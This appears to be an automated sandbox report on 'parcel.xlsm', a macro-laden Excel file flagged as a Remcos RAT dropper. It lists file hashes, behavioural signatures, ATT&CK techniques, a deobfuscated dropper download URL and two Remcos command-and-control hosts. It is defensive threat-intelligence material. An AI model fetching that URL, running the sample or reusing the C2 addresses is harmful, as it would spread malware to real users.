Overview

overview

10

Static

static

8

parcel.xlsm

windows7_x64

10

parcel.xlsm

windows10_x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    parcel.xlsm

  • Size

    18KB

  • Sample

    210309-lhd4kcz7nj

  • MD5

    0e1137f6c82bd9f4545156ce8fa1bfb5

  • SHA1

    e784d86a123ff452024780303be372966df32e5a

  • SHA256

    8c38dbbc3834ab600313e6cd32e0e1a077726f002a608b5cbf9baa87ff11f90f

  • SHA512

    ae79c139386eb2fe89f96a2dbfe434a1634d6ffbbca5bf0aa41507cfdaba8c8de140b430e7fc39433751aa17119678418fd4160a3492fb5917cc0b152e943533

Score
10/10
remcosmacrorat

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://adelantosi.com/cp/parcel.exe

Extracted

Family

remcos

C2

calvinlarry3551.hopto.org:2240

calvinlarry3551.ddns.net:2240

Targets

    • Target

      parcel.xlsm

    • Size

      18KB

    • MD5

      0e1137f6c82bd9f4545156ce8fa1bfb5

    • SHA1

      e784d86a123ff452024780303be372966df32e5a

    • SHA256

      8c38dbbc3834ab600313e6cd32e0e1a077726f002a608b5cbf9baa87ff11f90f

    • SHA512

      ae79c139386eb2fe89f96a2dbfe434a1634d6ffbbca5bf0aa41507cfdaba8c8de140b430e7fc39433751aa17119678418fd4160a3492fb5917cc0b152e943533

    Score
    10/10
    remcosrat

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Remcos

      Remcos is a closed-source remote control and surveillance software.

      ratremcos

    • Blocklisted process makes network request

    • Executes dropped EXE

    • Loads dropped DLL

    • Suspicious use of SetThreadContext

    behavioral1behavioral2

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

System Information Discovery

3
T1082

Query Registry

2
T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Tasks